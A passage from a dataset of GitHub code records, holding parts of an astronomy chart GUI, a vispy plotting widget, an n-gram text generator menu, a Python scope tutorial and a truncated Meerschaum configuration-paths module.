obj[el].set_visible(False)\r\n\r\n\r\n elif str_==\"Ecliptic scale\":\r\n self.plot.toggle_ecliptic_scale()\r\n\r\n elif str_==\"Equator scale\":\r\n self.plot.toggle_equator_scale()\r\n\r\n elif str_==\"Horizon scale\":\r\n self.plot.toggle_horizon_scale()\r\n\r\n elif str_==\"Prime vertical scale\":\r\n self.plot.toggle_prime_vert_scale()\r\n\r\n elif str_==\"Extra off\":\r\n self.plot.extra_off()\r\n\r\n self.plot.canvas.draw_idle()\r\n\r\n\r\n def toggle_houses_p(self):\r\n isVisible=self.plot.houses_ids[1][\"dot\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.houses_ids[i][\"dot\"].set_visible(not isVisible)\r\n\r\n def toggle_ecl_p(self):\r\n isVisible=self.plot.zodiac_ids[1][\"dot\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.zodiac_ids[i][\"dot\"].set_visible(not isVisible)\r\n\r\n def toggle_ecl_sym(self):\r\n isVisible=self.plot.zodiac_ids[1][\"text\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.zodiac_ids[i][\"text\"].set_visible(not isVisible)\r\n\r\n def prev_tk(self, event, r_click=None):\r\n Δt = self.spbox_var.get()\r\n val = self.rad_var.get()\r\n if r_click!=None:\r\n Δt=r_click\r\n if val ==\"Seconds\":\r\n self.plot.plot_next_prev(seconds=-Δt)\r\n elif val ==\"Minutes\":\r\n self.plot.plot_next_prev(minutes=-Δt)\r\n elif val ==\"Hours\":\r\n self.plot.plot_next_prev(hours=-Δt)\r\n\r\n def next_tk(self, event, r_click=None):\r\n Δt = self.spbox_var.get()\r\n val = self.rad_var.get()\r\n if r_click!=None:\r\n Δt=r_click\r\n if val ==\"Seconds\":\r\n self.plot.plot_next_prev(seconds=Δt)\r\n elif val ==\"Minutes\":\r\n self.plot.plot_next_prev(minutes=Δt)\r\n elif val ==\"Hours\":\r\n self.plot.plot_next_prev(hours=Δt)\r\n\r\n def anim_tk(self):\r\n s=0; m=0; h=0\r\n Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n if val==\"Seconds\":\r\n s=Δt\r\n elif val==\"Minutes\":\r\n m=Δt\r\n elif val==\"Hours\":\r\n h=Δt\r\n steps=self.spbox_var_st.get()\r\n for i in range(steps):\r\n self.parent.after(i*300, lambda s=s, m=m, h=h: self.plot.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.plot.canvas.draw_idle() \r\n return\r\n \r\n def anim_back_tk(self, event):\r\n s=0; m=0; h=0\r\n Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n Δt=-Δt\r\n if val==\"Seconds\":\r\n s=Δt\r\n elif val==\"Minutes\":\r\n m=Δt\r\n elif val==\"Hours\":\r\n h=Δt\r\n steps=self.spbox_var_st.get()\r\n for i in range(steps):\r\n self.parent.after(i*300, lambda s=s, m=m, h=h: self.plot.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.plot.canvas.draw_idle() \r\n return\r\n\r\n def reset_lat(self, time_):\r\n self.lat_v.set(\"0\")\r\n self.long_v.set(\"0\")\r\n\r\n def new_(self):\r\n Δt=self.spbox_var.get()\r\n lat_ = self.lat_v.get()\r\n lon_ = self.long_v.get()\r\n if lat_==\"\" or lon_==\"\":return\r\n lat_ = float(lat_)\r\n lon_ = float(lon_)\r\n if abs(lat_)>90 or abs(lon_)>180:\r\n messagebox.showwarning(\"Wrong value\", \"Values must be within intervals:\\nlatitude:\\n[0, 90] for North and [0, -90] for South\\nlongitude:\\n[0, 180] for East and [0, -180] for West\")\r\n return\r\n self.plot.extra_off()\r\n\r\n tz_=None\r\n t_obj = get_time_now(tz_=tz_)\r\n date_utc=t_obj[\"date_utc\"]\r\n time_utc=t_obj[\"time_utc\"]\r\n dataNow={'n': 'Planets', 'ln': 'positions'}\r\n dataNow[\"d_utc\"]=date_utc\r\n dataNow[\"t_utc\"]=time_utc\r\n dataNow[\"timestamp\"]=t_obj[\"timestamp\"]\r\n dataNow[\"lat\"]=lat_\r\n dataNow[\"lon\"]=lon_\r\n dataNow[\"tz\"]=tz_\r\n dataNow[\"date_loc\"]=t_obj[\"date_loc\"]\r\n dataNow[\"time_loc\"]=t_obj[\"time_loc\"]\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,lat_,lon_,trueNode=True)\r\n self.plot.new_now(planets_data, lat_, data=dataNow)\r\n\r\n\r\n def keypressed(self,event):\r\n if event.keysym==\"F1\":\r\n self.prev_tk(event)\r\n elif event.keysym==\"F2\":\r\n self.next_tk(event)\r\n elif event.keysym==\"1\":\r\n self.prev_tk(event)\r\n elif event.keysym==\"2\":\r\n self.next_tk(event)\r\n elif (event.state==12 and event.keysym==\"a\") or (event.state==12 and event.keysym==\"d\"): # 12=ctrl\r\n time_obj={\"minutes\":10}\r\n frames=self.spbox_var_st.get()\r\n Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n if val==\"Hours\":\r\n time_obj={\"hours\":Δt}\r\n elif val==\"Minutes\":\r\n time_obj={\"minutes\":Δt}\r\n if event.keysym==\"a\":\r\n time_obj.update({\"format\":\"gif\"})\r\n elif event.keysym==\"d\":\r\n time_obj.update({\"format\":\"mp4\"})\r\n self.plot.save_animation(frames=frames, **time_obj)\r\n\r\n\r\n def close_dialog(self):\r\n self.parent.wm_attributes(\"-disabled\", False)\r\n self.parent.deiconify() \r\n self.parent.destroy()\r\n\r\n def Exit(self):\r\n self.parent.destroy() \r\n\r\n\r\n\r\ndef draw_chart3D_now(data=None):\r\n if data==None:\r\n latitude = 40.673\r\n longitude=-73.945\r\n tz_ = \"America/New_York\"\r\n date_=get_time_now(seconds=None) \r\n date_utc = date_[\"date_utc\"]\r\n time_utc = date_[\"time_utc\"]\r\n dataNow={'n': 'Planets', 'ln': 'positions'}\r\n dataNow[\"d_utc\"]=date_[\"date_utc\"]\r\n dataNow[\"t_utc\"]=date_[\"time_utc\"]\r\n dataNow[\"timestamp\"]=date_[\"timestamp\"]\r\n dataNow[\"lat\"]=latitude\r\n dataNow[\"lon\"]=longitude\r\n dataNow[\"tz\"]=tz_\r\n d= date_[\"date_loc\"].split(\"-\")\r\n d=list(reversed(d))\r\n dataNow[\"d\"]=d \r\n t= date_[\"time_loc\"].split(\":\") \r\n dataNow[\"t\"]=t\r\n trueNode=True\r\n geo_latitude=latitude\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,latitude,longitude,trueNode=trueNode)\r\n ε=calc_.ε\r\n dataNow[\"obliquity\"]=ε \r\n dataNow[\"trueNode\"]=trueNode\r\n else:\r\n date_utc = data[\"d_utc\"]\r\n time_utc = data[\"t_utc\"]\r\n timestamp = data[\"timestamp\"]\r\n latitude = float(data[\"lat\"])\r\n longitude = float(data[\"lon\"])\r\n geo_latitude=latitude\r\n trueNode=data[\"trueNode\"]\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,latitude,longitude,trueNode=trueNode)\r\n dataNow=data\r\n GUI = GUI_astro3D(root, planets_data, geo_latitude, data=dataNow)\r\n return GUI\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n trueNode=True\r\n #print('sys.argv',len(sys.argv),'\\n',sys.argv);\r\n if len(sys.argv)>1:\r\n if len(sys.argv)>2 and sys.argv[2]==\"standalone\": #standalone command line\r\n data=eval(sys.argv[1])\r\n cmd_obj={\"date_utc\":data[\"d_utc\"], \"time_utc\": data[\"t_utc\"], \"lat\" : data[\"lat\"], \"lon\": data[\"lon\"],\"data\":data, \"trueNode\" : data[\"trueNode\"],\"timestamp\":data[\"timestamp\"]}\r\n else:\r\n json_object=sys.argv[1]\r\n cmd_obj= json.loads(json_object) \r\n\r\n date_utc=cmd_obj[\"date_utc\"]\r\n time_utc=cmd_obj[\"time_utc\"]\r\n latitude=float(cmd_obj[\"lat\"])\r\n longitude=float(cmd_obj[\"lon\"])\r\n trueNode=cmd_obj[\"trueNode\"] \r\n data=cmd_obj[\"data\"] \r\n print(\"command line\") \r\n else:\r\n data=None \r\n\r\n root = Tk()\r\n calc_=calc_for_3D()\r\n GUI = draw_chart3D_now(data)\r\n #keyboard.add_hotkey('esc', GUI.Exit)\r\n mainloop()\r\n\r\n\r\n","repo_name":"Drozdman-1/Astronomia3D","sub_path":"astronomia3D.pyw","file_name":"astronomia3D.pyw","file_ext":"pyw","file_size_in_byte":121480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31367333581","text":"from vispy import app, scene\r\nimport numpy as np\r\nimport math\r\nfrom collections import deque\r\n\r\nfrom PySide6.QtCore import Qt, Slot, QSize\r\nfrom PySide6.QtGui import QPainter, QFont, QScreen\r\nfrom PySide6.QtWidgets import QWidget, QFrame, QVBoxLayout, QPushButton\r\n# from PySide6.QtOpenGLWidgets import QOpenGLWidget\r\nfrom PySide6.QtUiTools import QUiLoader\r\nfrom PySide6.QtWidgets import QApplication\r\nfrom PySide6.QtDesigner import QPyDesignerCustomWidgetCollection\r\n\r\nclass MyPlotLabel(QWidget):\r\n def __init__(self, p_label, parent =None):\r\n super().__init__(parent)\r\n self.p_label = p_label\r\n \r\n def paintEvent(self, event):\r\n painter = QPainter(self)\r\n \r\n # cur_viewport = painter.viewport()\r\n # painter.setViewport(0,0,35,cur_viewport.height())\r\n\r\n # color = QColor(222, 0, 0)\r\n # painter.fillRect(painter.viewport(), color)\r\n\r\n # color = QColor(0, 0, 0)\r\n # color.setNamedColor('#d4d4d4')\r\n # painter.setPen(color)\r\n # painter.setBrush(QColor(0, 200, 0))\r\n # painter.drawRoundedRect(0, 0, 35, painter.viewport().height(), 5, 5)\r\n\r\n # clip = QRect(2, 2, painter.viewport().width() - 4, painter.viewport().height() - 4);\r\n \r\n painter.setPen(Qt.white)\r\n # painter.translate(10, 55)\r\n painter.translate(painter.viewport().width() - 4, painter.viewport().height() - 4)\r\n painter.rotate(-90)\r\n # painter.drawText(clip, self.p_label)\r\n bold = QFont();\r\n bold.setBold(True);\r\n painter.setFont(bold);\r\n painter.drawText(0, 0, self.p_label.upper())\r\n painter.end()\r\n\r\n# class PlotWidget(QOpenGLWidget):\r\nclass PlotWidget(QWidget):\r\n def __init__(self, controller, comp_name, odr, time_window, n_curves=1, parent=None, p_id = 0):\r\n super().__init__(parent)\r\n self.parent = parent\r\n self.controller = controller\r\n self.controller.sig_logging.connect(self.s_is_logging)\r\n \r\n self.is_docked = True\r\n self.app_qt = self.controller.qt_app\r\n\r\n self.p_id = p_id\r\n self.comp_name = comp_name\r\n \r\n self.canvas = scene.SceneCanvas(bgcolor=\"#1b1d23\", keys='interactive', vsync=True)\r\n self.canvas.native.setMinimumSize(QSize(300, 150))\r\n \r\n QPyDesignerCustomWidgetCollection.registerCustomWidget(PlotWidget, module=\"PlotWidget\")\r\n loader = QUiLoader()\r\n plot_widget = loader.load(\"HSD_GUI\\GUI\\plot_widget.ui\", parent)\r\n title_frame = plot_widget.frame_plot.findChild(QFrame,\"frame_title\")\r\n contents_frame = plot_widget.frame_plot.findChild(QFrame,\"frame_contents\")\r\n pushButton_pop_out = title_frame.findChild(QPushButton, \"pushButton_pop_out\")\r\n pushButton_pop_out.clicked.connect(self.clicked_pop_out_button)\r\n \r\n #Main layout\r\n main_layout = QVBoxLayout()\r\n self.setLayout(main_layout)\r\n main_layout.addWidget(plot_widget)\r\n\r\n title_frame.layout().addWidget(MyPlotLabel(\"{}\".format(self.comp_name)))\r\n \r\n contents_frame.layout().addWidget(self.canvas.native)\r\n \r\n grid = self.canvas.central_widget.add_grid(spacing=0)\r\n self.viewbox = grid.add_view(row=0, col=1, camera='panzoom')\r\n\r\n # add the axes\r\n x_axis = scene.AxisWidget(orientation='bottom')\r\n x_axis.stretch = (1, 0.1)\r\n x_axis.axis.axis_width = x_axis.axis.tick_width = 1\r\n x_axis.axis.text_color = '#1b1d23' #same as background (hide text)\r\n x_axis.axis.axis_color = '#d2d2d2'\r\n x_axis.axis.tick_color = '#666666'\r\n grid.add_widget(x_axis, row=1, col=1)\r\n x_axis.link_view(self.viewbox)\r\n y_axis = scene.AxisWidget(orientation='left')\r\n y_axis.stretch = (0.1, 1)\r\n y_axis.axis.axis_width = y_axis.axis.tick_width = 1\r\n y_axis.axis.text_color = '#d2d2d2'\r\n y_axis.axis.axis_color = '#d2d2d2'\r\n y_axis.axis.tick_color = '#666666'\r\n grid.add_widget(y_axis, row=0, col=0)\r\n y_axis.link_view(self.viewbox)\r\n\r\n self.positions = dict()\r\n self._data = dict() # dict of queues\r\n\r\n self.update_plots_ui(odr, time_window, n_curves)\r\n\r\n self.updateTimer = app.Timer() # Setting up the timer to update UI\r\n self.updateTimer.connect(self.update_plot)\r\n\r\n def update_plots_ui(self, odr, time_window, n_curves): \r\n \r\n self.positions = dict()\r\n self._data = dict() # dict of queues\r\n self.curves = dict()\r\n\r\n self.n_curves = n_curves\r\n\r\n self.downsampling_factor = 1\r\n self.samples_cnt = int(odr * time_window)\r\n digits = int(math.log10(self.samples_cnt))+1\r\n \r\n #Downsampling based on sensor ODR and time_window (Max plottable point in a time_window = 9999)\r\n if digits > 4:\r\n self.downsampling_factor = 10**(digits-4)\r\n self.N = int(self.samples_cnt/self.downsampling_factor)\r\n\r\n self.color = dict()\r\n # color arrays\r\n for i in range(n_curves):\r\n self.color[i] = np.ones((self.N, 4), dtype=np.float32)\r\n self.color[i][:, 0] = np.linspace((i/self.n_curves), ((i+1)/self.n_curves), self.N)\r\n self.color[i][:, 1] = self.color[i][::-1, 0]\r\n\r\n # add a line plot inside the viewbox\r\n for i in range(self.n_curves):\r\n self._data[i] = deque(maxlen=self.N)\r\n self.positions[i] = np.zeros((self.N, 2), dtype='f')#self._dtype_from_data_type(data_type))\r\n x_lim = [0., self.N]\r\n self.positions[i][:, 0] = np.linspace(x_lim[0], x_lim[1], self.N)\r\n\r\n self.curves[i] = scene.Line(self.positions[i], self.color[i], method='gl', parent=self.viewbox.scene)\r\n #TODO TEST\r\n self.app_qt.processEvents()\r\n\r\n #TODO use FS\r\n self.min_d = 0\r\n self.max_d = 10 \r\n self.viewbox.camera.set_range(x = (0,int(self.N)), y =(self.min_d,self.max_d))\r\n\r\n self.update()\r\n\r\n @Slot()\r\n def clicked_pop_out_button(self):\r\n if self.is_docked:\r\n self.pop_out_widget()\r\n self.is_docked = False\r\n else:\r\n self.pop_in_widget()\r\n self.is_docked = True\r\n\r\n @Slot(bool)\r\n def s_is_logging(self, state: bool):\r\n print(\"sensor\", self.comp_name, \"is_logging\", state)\r\n if state:\r\n self.updateTimer.start(0)\r\n else:\r\n self.updateTimer.stop()\r\n\r\n def reset(self):\r\n pass\r\n # self._data = deque(maxlen=self._window_size)\r\n\r\n # for c in self._curves:\r\n # self._plot.removeItem(c)\r\n\r\n # self._curves = []\r\n\r\n # for i in range(self.n_curves):\r\n # self._curves.append(self._plot.plot(pen=pg.mkPen(self.colors[i % len(self.colors)], width=1),connect='auto'))\r\n # self._curves[i].setDownsampling(auto=True, method='peak')\r\n # self._curves[i].setClipToView(True)\r\n\r\n def update_plot(self, ev): \r\n if len(self._data[0]) > 0:\r\n max_d_now = []\r\n min_d_now = []\r\n for i in range(self.n_curves):\r\n if len(self._data[i]) < self.N:\r\n a = self.positions[i][:(self.N - len(self._data[i])),1]\r\n self.positions[i][:, 1] = np.append(a,np.array(self._data[i]))\r\n else: \r\n self.positions[i][:, 1] = np.array(self._data[i])\r\n\r\n self.curves[i].set_data(pos=self.positions[i], color=self.color[i])\r\n \r\n #TODO to be improved\r\n min_d_now.append(np.amin(self.positions[i][:, 1]))\r\n max_d_now.append(np.amax(self.positions[i][:, 1]))\r\n \r\n max_data = np.amax(max_d_now)\r\n min_data = np.amin(min_d_now)\r\n if min_data < self.min_d:\r\n self.viewbox.camera.set_range(x=(0,self.N),y=(min_data, self.max_d))\r\n self.min_d = min_data\r\n if max_data > self.max_d:\r\n self.viewbox.camera.set_range(x=(0,self.N),y=(self.min_d, max_data))\r\n self.max_d = max_data\r\n \r\n self.app_qt.processEvents()\r\n\r\n def add_data(self, data):\r\n # if len(data) > 0:\r\n for i in range(self.n_curves):\r\n # Downsampling for PLOTs\r\n self._data[i].extend(data[i][0:data[i].size:self.downsampling_factor])\r\n\r\n def closeEvent(self, event):\r\n event.accept()\r\n\r\n def closeEvent(self, event):\r\n self.pop_in_widget()\r\n self.is_docked = True\r\n\r\n def pop_out_widget(self):\r\n self.setWindowFlags(Qt.Dialog)\r\n center = QScreen.availableGeometry(QApplication.primaryScreen()).center()\r\n geo = self.frameGeometry()\r\n geo.moveCenter(center)\r\n self.move(geo.topLeft())\r\n self.show()\r\n\r\n def pop_in_widget(self):\r\n self.setWindowFlags(Qt.Widget)\r\n self.parent.layout().insertWidget(self.p_id, self)","repo_name":"dmelpi/eai-polimi","sub_path":"contrib/DATA_Analysis/Vespucci/HSD_GUI/PlotWidget.py","file_name":"PlotWidget.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"}
+{"seq_id":"8081493841","text":"from lm import LanguageModel\nfrom text_preprocessing import TextPrepocessing\n\nimport re\nimport os\n\n# Necessary for unit-tests\ndef get_input(text):\n return input(text)\n\n# Necessary for unit-tests\ndef main():\n pass\n\nclass Main():\n program_is_over = False\n\n @property\n def language_model(self):\n return self.__language_model\n @language_model.setter\n def language_model(self, language_model):\n self.__language_model = language_model\n\n def __init__(self):\n print(\"Main instance created\")\n\n # Check entered int value\n def enter_int_number(self):\n while True:\n user_input = get_input(\"Please, enter an intager number:\\n\")\n try:\n value = int(user_input)\n if (value > 0):\n return value\n else:\n print(\"Entered number is negative\")\n except ValueError:\n print(\"Entered incorrect input\")\n\n # Present information about functionality of the program\n def present_options(self):\n print(\"\\nEnter the number of row for desired operation.\")\n print(\"For generating text, first of all you should create language model. \\n\")\n print(\"1. Create a new language model\")\n print(\"2. Generate a text from the language model, and print it to the screen\")\n print(\"3. Generate a user-specified number of texts from the language model, and write them to a file\")\n print(\"4. Create a new language model with smoothing\")\n print(\"5. Exit the program \\n\")\n\n # \"Switch\" imitation\n def choose_option(self):\n entered_option_number = self.enter_int_number()\n switcher = {\n 1: self.create_language_model,\n 2: self.generate_text,\n 3: self.generate_text_and_save,\n 4: self.create_language_model_with_smoothing,\n 5: self.exit_the_program\n }\n func = switcher.get(entered_option_number, self.option_does_not_exist)\n \n return func()\n \n def create_language_model(self, smoothing = False):\n print(\"\\nCreating a language model\")\n print(\"Enter the number for N-parameter\")\n n_parameter = self.enter_int_number()\n\n if(n_parameter > 10 or n_parameter <= 1):\n print(\"n-parameter is invalid. Please, enter the value less than 10 and more than 1.\")\n return\n\n self.language_model = LanguageModel(n_parameter)\n if smoothing:\n self.language_model.turn_on_smoothing() \n\n valid_file_path = self.find_file()\n\n with open(valid_file_path, \"r\") as openedFile:\n full_text = openedFile.read()\n text_preprocessing = TextPrepocessing(full_text)\n tokens = text_preprocessing.start_preprocessing() \n self.language_model.train(tokens)\n\n def find_file(self):\n try:\n print(\"\\nEnter the file-path with text for training the language model.\")\n print(\"Or enter \\\"NONE\\\" or \\\"none\\\" (without \\\"\\\") or just press \\\"Enter\\\" key for reading train_shakespeare.txt from the same directory with main.py\")\n entered_file_path = input()\n if (entered_file_path == \"NONE\" or entered_file_path == \"none\" or entered_file_path == \"\"): \n # Read the default file from the same directory, if NONE entered \n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n entered_file_path = __location__.replace('\\\\', '/') + \"/train_shakespeare.txt\" \n else:\n # Read file from the entered file-path\n entered_file_path = entered_file_path.replace('\\\\', '/') \n\n with open(entered_file_path, \"r\") as openedFile:\n print(\"\\nFile succesfully found \\n\")\n\n return entered_file_path \n except FileNotFoundError as ex:\n print(\"File not found. Please, try one more time\")\n self.find_file()\n\n def generate_text(self, intered_text = None):\n try:\n if (self.language_model == None):\n raise AttributeError()\n print(\"Enter desired begining of the text\")\n print(\"Or enter \\\"NONE\\\" or \\\"none\\\" (without \\\"\\\") or just press \\\"Enter\\\" key for generating random text\")\n entered_begining = input()\n generated_text = \"\"\n if (entered_begining != \"NONE\" or entered_begining != \"none\" or entered_begining != \"\"):\n generated_text = self.language_model.generate(entered_begining.split()) \n else:\n generated_text = self.language_model.generate()\n\n if generated_text != None:\n print(\"\\nGenerated text:\")\n print(generated_text)\n else:\n print(\"\\nUnfortunately with this beginning nothing was found\")\n \n except AttributeError:\n print(\"\\nIt is necessary first of all create a language model (option 1)\")\n self.create_language_model()\n\n def generate_text_and_save(self):\n print(\"\\nEnter desired number of texts\")\n entered_number_of_texts = self.enter_int_number()\n if (entered_number_of_texts > 0 and entered_number_of_texts < 1000):\n print(\"Writing texts to a file has started\")\n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n file_in_root_folder = __location__.replace('\\\\', '/') + \"/new_shakespeare.txt\" \n with open(file_in_root_folder, \"w\") as created_file:\n i = 1\n while i in range(0, entered_number_of_texts + 1):\n generated_text = self.language_model.generate()\n created_file.write(\"{0}. {1}{2}\".format(i, generated_text, \"\\n\"))\n i += 1\n print(\"Writing texts to a file has ended\")\n else:\n print(\"Entered inappropriate number\")\n self.generate_text_and_save()\n\n def create_language_model_with_smoothing(self):\n self.create_language_model(smoothing = True)\n\n def exit_the_program(self):\n print(\"\\nProgram is over.\")\n Main.program_is_over = True\n\n # If entered the not existed number of operation\n def option_does_not_exist(self):\n print(\"\\nThere is no such option. Repeat entering option number again.\\n\")\n self.choose_option() \n\n def start(self):\n while True:\n # Close program if this option picked\n if Main.program_is_over:\n break\n self.present_options()\n self.choose_option()\n\nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n main = Main()\n main.start()","repo_name":"FoxGriVer/PythonLabs","sub_path":"n-gramms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"22844423566","text":"print(\"function s()\")\ndef s():\n # local\n a = 11\n b = 22\n c = 33\n print('local:', a, b, c) # 11, 22, 33\n\n# global\na = 100\nb = 200\nc = 300\n\ns()\nprint('global:', a, b, c) # 100, 200, 300\nprint()\n\n\nprint(\"\\nfunction f()\")\ndef f():\n # local\n aa = 11\n bb = 22\n print('local:', aa, bb, cc) # 11, 22, 300 (c is global variable)\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nf()\nprint('global:', aa, bb, cc) # 100, 200, 300\n\n\nprint(\"\\nfunction ss()\")\ndef ss(aa, bb, cc):\n # local\n print('local:', aa, bb, cc)\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nss(aa, bb, cc) # параметри, що передаються у ф-ію, автоматично стають локальними змінними всередині ф-ії\nprint('global:', aa, bb, cc)\n\n\n\nprint(\"\\nfunction sss()\")\ndef sss(aa, bb, cc):\n # local\n print(id(aa)) # aa - is global\n aa = 20\n print(id(aa)) # aa - is local now\n print('local:', aa, bb, cc) # local: 20 200 300\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nsss(aa, bb, cc) # параметри, що передаються у ф-ію, автоматично стають локальними змінними всередині ф-ії\nprint('global:', aa, bb, cc) # global: 100 200 300\nprint(id(aa))\n","repo_name":"SvitlanaPY/Python_tasks","sub_path":"Func/Func_Rules/Obl_Vydym_local_global.py","file_name":"Obl_Vydym_local_global.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"19680241218","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n\n\"\"\"\nDefine file paths\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom pathlib import Path\nimport os, platform, sys, json\nfrom meerschaum.utils.typing import Union\nfrom meerschaum.config.static import STATIC_CONFIG\n\nDOT_CONFIG_DIR_PATH = Path(\n os.environ.get('XDG_CONFIG_HOME', Path.home() / '.config')\n if platform.system() != 'Windows'\n else os.environ.get('AppData', Path.home() / 'AppData' / 'Roaming')\n)\n\nDEFAULT_ROOT_DIR_PATH = (\n (DOT_CONFIG_DIR_PATH / 'meerschaum')\n if platform.system() != 'Windows'\n else (DOT_CONFIG_DIR_PATH / 'Meerschaum')\n)\n\n\nENVIRONMENT_ROOT_DIR = STATIC_CONFIG['environment']['root']\nif ENVIRONMENT_ROOT_DIR in os.environ:\n _ROOT_DIR_PATH = Path(os.environ[ENVIRONMENT_ROOT_DIR]).resolve()\n if not _ROOT_DIR_PATH.exists():\n print(\n f\"Invalid root directory '{str(_ROOT_DIR_PATH)}' set for \" +\n f\"environment variable '{ENVIRONMENT_ROOT_DIR}'.\\n\" +\n f\"Please enter a valid path for {ENVIRONMENT_ROOT_DIR}.\",\n file = sys.stderr,\n )\n sys.exit(1)\nelse:\n _ROOT_DIR_PATH = DEFAULT_ROOT_DIR_PATH\n\nENVIRONMENT_PLUGINS_DIR = STATIC_CONFIG['environment']['plugins']\nif ENVIRONMENT_PLUGINS_DIR in os.environ:\n try:\n PLUGINS_DIR_PATHS = (\n [\n Path(path).resolve()\n for path in json.loads(os.environ[ENVIRONMENT_PLUGINS_DIR])\n ] if os.environ[ENVIRONMENT_PLUGINS_DIR].lstrip().startswith('[')\n else [\n Path(path_str).resolve()\n for path_str in os.environ[ENVIRONMENT_PLUGINS_DIR].split(':')\n if path_str\n ]\n )\n except Exception as e:\n PLUGINS_DIR_PATHS = []\n\n if not PLUGINS_DIR_PATHS:\n print(\n \"Invalid plugins directories set for \"\n f\"environment variable '{ENVIRONMENT_PLUGINS_DIR}'.\\n\\n\"\n f\"Set this to a colon-separated path string:\\n\\n\"\n f\"`export {ENVIRONMENT_PLUGINS_DIR}=./plugins:/another/path/to/plugins`\\n\\n\"\n \"or a JSON-encoded path list:\\n\\n\"\n f\"`export {ENVIRONMENT_PLUGINS_DIR}=\" + \"'[\\\"./plugins\\\", \\\"/another/path/to/plugins\\\"]'`\"\n f\"\",\n )\n sys.exit(1)\nelse:\n PLUGINS_DIR_PATHS = [_ROOT_DIR_PATH / 'plugins']\n\n### Remove duplicate plugins paths.\n_seen_plugins_paths, _plugins_paths_to_remove = set(), set()\nfor _plugin_path in PLUGINS_DIR_PATHS:\n if _plugin_path in _seen_plugins_paths:\n _plugins_paths_to_remove.add(_plugin_path)\n _seen_plugins_paths.add(_plugin_path)\nfor _plugin_path in _plugins_paths_to_remove:\n PLUGINS_DIR_PATHS.remove(_plugin_path)\n\n\npaths = {\n 'PACKAGE_ROOT_PATH' : str(Path(__file__).parent.parent.resolve()),\n 'ROOT_DIR_PATH' : str(_ROOT_DIR_PATH),\n 'VIRTENV_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'venvs'),\n 'CONFIG_DIR_PATH' : ('{ROOT_DIR_PATH}', 'config'),\n 'DEFAULT_CONFIG_DIR_PATH' : ('{ROOT_DIR_PATH}', 'default_config'),\n 'PATCH_DIR_PATH' : ('{ROOT_DIR_PATH}', 'patch_config'),\n 'PERMANENT_PATCH_DIR_PATH' : ('{ROOT_DIR_PATH}', 'permanent_patch_config'),\n 'INTERNAL_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', '.internal'),\n\n 'STACK_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'stack'),\n 'STACK_COMPOSE_FILENAME' : 'docker-compose.yaml',\n 'STACK_COMPOSE_PATH' : ('{STACK_RESOURCES_PATH}', '{STACK_COMPOSE_FILENAME}'),\n 'STACK_ENV_FILENAME' : '.env',\n 'STACK_ENV_PATH' : ('{STACK_RESOURCES_PATH}', '{STACK_ENV_FILENAME}'),\n\n 'SHELL_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', ),\n 'SHELL_HISTORY_PATH' : ('{SHELL_RESOURCES_PATH}', '.mrsm_history'),\n\n 'API_RESOURCES_PATH' : ('{PACKAGE_ROOT_PATH}', 'api', 'resources'),\n 'API_STATIC_PATH' : ('{API_RESOURCES_PATH}', 'static'),\n 'API_TEMPLATES_PATH' : ('{API_RESOURCES_PATH}', 'templates'),\n 'API_CONFIG_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'api'),\n 'API_SECRET_KEY_PATH' : ('{API_CONFIG_RESOURCES_PATH}', '.api_secret_key'),\n 'API_UVICORN_RESOURCES_PATH' : ('{API_CONFIG_RESOURCES_PATH}', 'uvicorn'),\n 'API_UVICORN_CONFIG_PATH' : ('{API_UVICORN_RESOURCES_PATH}', '.thread_config.json'),\n\n 'CACHE_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', '.cache'),\n 'PIPES_CACHE_RESOURCES_PATH' : ('{CACHE_RESOURCES_PATH}', 'pipes'),\n 'USERS_CACHE_RESOURCES_PATH' : ('{CACHE_RESOURCES_PATH}', 'users'),\n\n 'PLUGINS_RESOURCES_PATH' : ('{INTERNAL_RESOURCES_PATH}', 'plugins'),\n 'PLUGINS_INTERNAL_LOCK_PATH' : ('{INTERNAL_RESOURCES_PATH}', 'plugins.lock'),\n 'PLUGINS_ARCHIVES_RESOURCES_PATH': ('{PLUGINS_RESOURCES_PATH}', '.archives'),\n 'PLUGINS_TEMP_RESOURCES_PATH' : ('{PLUGINS_RESOURCES_PATH}', '.tmp'),\n 'PLUGINS_INIT_PATH' : ('{PLUGINS_RESOURCES_PATH}', '__init__.py'),\n\n 'SQLITE_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'sqlite'),\n 'SQLITE_DB_PATH' : ('{SQLITE_RESOURCES_PATH}', 'mrsm_local.db'),\n\n 'DUCKDB_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'duckdb'),\n 'DUCKDB_PATH' : 